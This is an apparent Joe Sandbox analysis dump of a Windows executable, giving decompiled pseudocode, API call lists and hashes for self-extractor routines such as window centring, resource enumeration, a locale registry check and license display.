                                                                                                                                                                                                        0x00de2bb5
                                                                                                                                                                                                        0x00de2bb8
                                                                                                                                                                                                        0x00de2bb8
                                                                                                                                                                                                        0x00de2bba
                                                                                                                                                                                                        0x00de2bbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2bb8
                                                                                                                                                                                                        0x00de2b28
                                                                                                                                                                                                        0x00de2b2e
                                                                                                                                                                                                        0x00de2b33
                                                                                                                                                                                                        0x00de2b39
                                                                                                                                                                                                        0x00de2b3c
                                                                                                                                                                                                        0x00de2b3c
                                                                                                                                                                                                        0x00de2b3e
                                                                                                                                                                                                        0x00de2b3f
                                                                                                                                                                                                        0x00de2b55
                                                                                                                                                                                                        0x00de2b5d
                                                                                                                                                                                                        0x00de2b64
                                                                                                                                                                                                        0x00de2b64
                                                                                                                                                                                                        0x00de2b7a
                                                                                                                                                                                                        0x00de2b7f
                                                                                                                                                                                                        0x00de2b81
                                                                                                                                                                                                        0x00de2b81
                                                                                                                                                                                                        0x00de2b84
                                                                                                                                                                                                        0x00de2b84
                                                                                                                                                                                                        0x00de2b86
                                                                                                                                                                                                        0x00de2b87
                                                                                                                                                                                                        0x00de2bbf
                                                                                                                                                                                                        0x00de2bc1
                                                                                                                                                                                                        0x00de2bc1
                                                                                                                                                                                                        0x00de2b26
                                                                                                                                                                                                        0x00de2bda
                                                                                                                                                                                                        0x00de2bda
                                                                                                                                                                                                        0x00de2be6
                                                                                                                                                                                                        0x00de2be6
                                                                                                                                                                                                        0x00de2bf8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00DE2AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00DE2AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00DE2B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 00DE2B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 00DE2B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00DE2BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: dd36150f138c839268d83971856eeb32b25cbf8bc575361d6d964d4215127482
                                                                                                                                                                                                        • Instruction ID: c73279af727de53a33fa412b9c036110cfb73a2036ee14f3b1d311ed015cf68b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd36150f138c839268d83971856eeb32b25cbf8bc575361d6d964d4215127482
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 874112346043C69EDB15BF358C94AFE7BAD9F56310F18409AE8C287206DB359E86CB71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00DE43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				struct tagRECT _v24;
                                                                                                                                                                                                        				struct tagRECT _v40;
                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				struct HWND__* _t63;
                                                                                                                                                                                                        				struct HWND__* _t67;
                                                                                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                                                                                        				struct HDC__* _t69;
                                                                                                                                                                                                        				int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t63 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                        				_t68 = __edx;
                                                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                        				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                        				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                        				_t69 = GetDC(_v44);
                                                                                                                                                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                        				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                        				_t56 = _v48;
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                        				_t67 = 0;
                                                                                                                                                                                                        				if(_t72 >= 0) {
                                                                                                                                                                                                        					_t63 = _v52;
                                                                                                                                                                                                        					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                        						_t72 = _t63 - _t56;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t72 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                        				if(_t59 >= 0) {
                                                                                                                                                                                                        					_t63 = _v60;
                                                                                                                                                                                                        					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                        						_t59 = _t63 - _t53;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t59 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                        			}
























                                                                                                                                                                                                        0x00de43d0
                                                                                                                                                                                                        0x00de43d8
                                                                                                                                                                                                        0x00de43df
                                                                                                                                                                                                        0x00de43e6
                                                                                                                                                                                                        0x00de43ec
                                                                                                                                                                                                        0x00de43f1
                                                                                                                                                                                                        0x00de4400
                                                                                                                                                                                                        0x00de4403
                                                                                                                                                                                                        0x00de440b
                                                                                                                                                                                                        0x00de4420
                                                                                                                                                                                                        0x00de4429
                                                                                                                                                                                                        0x00de4437
                                                                                                                                                                                                        0x00de4444
                                                                                                                                                                                                        0x00de4447
                                                                                                                                                                                                        0x00de444d
                                                                                                                                                                                                        0x00de4454
                                                                                                                                                                                                        0x00de445b
                                                                                                                                                                                                        0x00de4460
                                                                                                                                                                                                        0x00de4461
                                                                                                                                                                                                        0x00de4467
                                                                                                                                                                                                        0x00de446f
                                                                                                                                                                                                        0x00de4473
                                                                                                                                                                                                        0x00de4473
                                                                                                                                                                                                        0x00de4463
                                                                                                                                                                                                        0x00de4463
                                                                                                                                                                                                        0x00de4463
                                                                                                                                                                                                        0x00de447a
                                                                                                                                                                                                        0x00de4481
                                                                                                                                                                                                        0x00de4484
                                                                                                                                                                                                        0x00de448a
                                                                                                                                                                                                        0x00de4492
                                                                                                                                                                                                        0x00de4496
                                                                                                                                                                                                        0x00de4496
                                                                                                                                                                                                        0x00de4486
                                                                                                                                                                                                        0x00de4486
                                                                                                                                                                                                        0x00de4486
                                                                                                                                                                                                        0x00de44b8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00DE43F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00DE440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00DE4423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00DE442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00DE443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00DE4447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00DE44A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: 17d1cf27310b53f924162f19abb4b63b9c08e7707bd7cc41793282f4e24fe36d
                                                                                                                                                                                                        • Instruction ID: ce2aa0a203c3f5b55025430a78ac4f91f3136a70d7352c9061e63025502c1d43
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17d1cf27310b53f924162f19abb4b63b9c08e7707bd7cc41793282f4e24fe36d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F314B32E00259AFCB14DFB8DD889EEBBB5EB89310F154169F805F7280DA70AD058B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E00DE6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				struct HRSRC__* _t21;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				struct HINSTANCE__* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				_t36 = 1;
                                                                                                                                                                                                        				E00DE171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t51 = _t51 + 0x10;
                                                                                                                                                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                        						 *0xde9124 = 0x80070714;
                                                                                                                                                                                                        						_t36 = _t46;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                        						_t44 = _t5;
                                                                                                                                                                                                        						_t40 = _t44;
                                                                                                                                                                                                        						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                        						_t47 = _t6;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t26 =  *_t40;
                                                                                                                                                                                                        							_t40 = _t40 + 1;
                                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                                        						_t41 = _t40 - _t47;
                                                                                                                                                                                                        						_t46 = _t51;
                                                                                                                                                                                                        						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                        						 *0xdea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                        						_t30 = _v32();
                                                                                                                                                                                                        						if(_t51 != _t51) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(_t45);
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							_t36 = 0;
                                                                                                                                                                                                        							FreeResource(??);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							FreeResource();
                                                                                                                                                                                                        							_v36 = _v36 + 1;
                                                                                                                                                                                                        							E00DE171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                        							_t46 = 0;
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					return E00DE6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x00de6298
                                                                                                                                                                                                        0x00de62a0
                                                                                                                                                                                                        0x00de62a7
                                                                                                                                                                                                        0x00de62ad
                                                                                                                                                                                                        0x00de62af
                                                                                                                                                                                                        0x00de62bb
                                                                                                                                                                                                        0x00de62c3
                                                                                                                                                                                                        0x00de62c4
                                                                                                                                                                                                        0x00de633b
                                                                                                                                                                                                        0x00de633b
                                                                                                                                                                                                        0x00de6345
                                                                                                                                                                                                        0x00de634d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de62da
                                                                                                                                                                                                        0x00de62de
                                                                                                                                                                                                        0x00de635f
                                                                                                                                                                                                        0x00de6369
                                                                                                                                                                                                        0x00de62e0
                                                                                                                                                                                                        0x00de62e0
                                                                                                                                                                                                        0x00de62e0
                                                                                                                                                                                                        0x00de62e3
                                                                                                                                                                                                        0x00de62e5
                                                                                                                                                                                                        0x00de62e5
                                                                                                                                                                                                        0x00de62e8
                                                                                                                                                                                                        0x00de62e8
                                                                                                                                                                                                        0x00de62ea
                                                                                                                                                                                                        0x00de62eb
                                                                                                                                                                                                        0x00de62ef
                                                                                                                                                                                                        0x00de62f1
                                                                                                                                                                                                        0x00de62f3
                                                                                                                                                                                                        0x00de6302
                                                                                                                                                                                                        0x00de6308
                                                                                                                                                                                                        0x00de630d
                                                                                                                                                                                                        0x00de6314
                                                                                                                                                                                                        0x00de6314
                                                                                                                                                                                                        0x00de6316
                                                                                                                                                                                                        0x00de6319
                                                                                                                                                                                                        0x00de6355
                                                                                                                                                                                                        0x00de6357
                                                                                                                                                                                                        0x00de631b
                                                                                                                                                                                                        0x00de631b
                                                                                                                                                                                                        0x00de6331
                                                                                                                                                                                                        0x00de6334
                                                                                                                                                                                                        0x00de6339
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6339
                                                                                                                                                                                                        0x00de6319
                                                                                                                                                                                                        0x00de636b
                                                                                                                                                                                                        0x00de637d
                                                                                                                                                                                                        0x00de637d
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE171E: _vsnprintf.MSVCRT ref: 00DE1750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00DE51CA,00000004,00000024,00DE2F71,?,00000002,00000000), ref: 00DE62CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00DE51CA,00000004,00000024,00DE2F71,?,00000002,00000000), ref: 00DE62D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00DE51CA,00000004,00000024,00DE2F71,?,00000002,00000000), ref: 00DE631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00DE6345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00DE51CA,00000004,00000024,00DE2F71,?,00000002,00000000), ref: 00DE6357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: 5e073988b32bd30e50cf489aa9bb6b80ca848ca3f247b3defaeade7c152f2e22
                                                                                                                                                                                                        • Instruction ID: 2b780b037936633658de45ddcd660b181cde5799761f558ee62d0d9987debf41
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e073988b32bd30e50cf489aa9bb6b80ca848ca3f247b3defaeade7c152f2e22
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9321F675A00399AFDB10BF66CC859BEBB78EB44750B180119FA02E7241DB35DD068BF1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00DE681F(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                        				void* _v172;
                                                                                                                                                                                                        				int* _v176;
                                                                                                                                                                                                        				int _v180;
                                                                                                                                                                                                        				int _v184;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t36 = __ebx;
                                                                                                                                                                                                        				_t19 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                        				_t41 =  *0xde81d8; // 0xfffffffe
                                                                                                                                                                                                        				_t43 = 0;
                                                                                                                                                                                                        				_v180 = 0xc;
                                                                                                                                                                                                        				_v176 = 0;
                                                                                                                                                                                                        				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                        					 *0xde81d8 = 0;
                                                                                                                                                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        						_t41 =  *0xde81d8; // 0xfffffffe
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = 1;
                                                                                                                                                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t31 = RegQueryValueExA(_v172, 0xde1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                        							_t43 = _t31;
                                                                                                                                                                                                        							RegCloseKey(_v172);
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t40 =  &_v176;
                                                                                                                                                                                                        								if(E00DE66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                        										 *0xde81d8 = _t41;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00de681f
                                                                                                                                                                                                        0x00de682a
                                                                                                                                                                                                        0x00de6831
                                                                                                                                                                                                        0x00de6836
                                                                                                                                                                                                        0x00de683c
                                                                                                                                                                                                        0x00de683e
                                                                                                                                                                                                        0x00de6848
                                                                                                                                                                                                        0x00de6851
                                                                                                                                                                                                        0x00de685d
                                                                                                                                                                                                        0x00de6864
                                                                                                                                                                                                        0x00de6876
                                                                                                                                                                                                        0x00de693a
                                                                                                                                                                                                        0x00de693a
                                                                                                                                                                                                        0x00de687c
                                                                                                                                                                                                        0x00de687e
                                                                                                                                                                                                        0x00de6885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de68d6
                                                                                                                                                                                                        0x00de68f4
                                                                                                                                                                                                        0x00de6900
                                                                                                                                                                                                        0x00de6902
                                                                                                                                                                                                        0x00de690a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de690c
                                                                                                                                                                                                        0x00de690c
                                                                                                                                                                                                        0x00de691c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de691e
                                                                                                                                                                                                        0x00de6924
                                                                                                                                                                                                        0x00de692b
                                                                                                                                                                                                        0x00de6932
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de692b
                                                                                                                                                                                                        0x00de691c
                                                                                                                                                                                                        0x00de690a
                                                                                                                                                                                                        0x00de6885
                                                                                                                                                                                                        0x00de6876
                                                                                                                                                                                                        0x00de6951

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00DE686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00DE68A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00DE68CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00DE1140,00000000,?,?,0000000C), ref: 00DE68F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00DE6902
                                                                                                                                                                                                          • Part of subcall function 00DE66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00DE691A), ref: 00DE6741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 00DE68C2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-1109908249
                                                                                                                                                                                                        • Opcode ID: 847e9c3d29fb98e589f27b976463e7bca9f6e96104aa8b872fb1c07a39a36aa8
                                                                                                                                                                                                        • Instruction ID: d2ff61d4c5ebadd7af616a0fb0d9cc2a2f274ae9d6c16d51966b7036182e1fca
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 847e9c3d29fb98e589f27b976463e7bca9f6e96104aa8b872fb1c07a39a36aa8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8318431A403A89FDB31EB16CC84BAA7778EB557A4F040195E94DEA241DB30DD85CF72
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE3A3F(void* __eflags) {
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = "LICENSE";
                                                                                                                                                                                                        				_t1 = E00DE468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				 *0xde8d4c = _t3;
                                                                                                                                                                                                        				if(_t3 != 0) {
                                                                                                                                                                                                        					_t19 = _t16;
                                                                                                                                                                                                        					if(E00DE468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA( *0xde8d4c, "<None>") == 0) {
                                                                                                                                                                                                        							LocalFree( *0xde8d4c);
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xde9124 = 0;
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t9 = E00DE6517(_t19, 0x7d1, 0, E00DE3100, 0, 0);
                                                                                                                                                                                                        						LocalFree( *0xde8d4c);
                                                                                                                                                                                                        						if(_t9 != 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xde9124 = 0x800704c7;
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E00DE44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree( *0xde8d4c);
                                                                                                                                                                                                        					 *0xde9124 = 0x80070714;
                                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00DE44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        0x00de3a46
                                                                                                                                                                                                        0x00de3a57
                                                                                                                                                                                                        0x00de3a5d
                                                                                                                                                                                                        0x00de3a63
                                                                                                                                                                                                        0x00de3a6a
                                                                                                                                                                                                        0x00de3a91
                                                                                                                                                                                                        0x00de3a9a
                                                                                                                                                                                                        0x00de3ad8
                                                                                                                                                                                                        0x00de3b13
                                                                                                                                                                                                        0x00de3b19
                                                                                                                                                                                                        0x00de3b1b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3b21
                                                                                                                                                                                                        0x00de3ae7
                                                                                                                                                                                                        0x00de3af4
                                                                                                                                                                                                        0x00de3afc
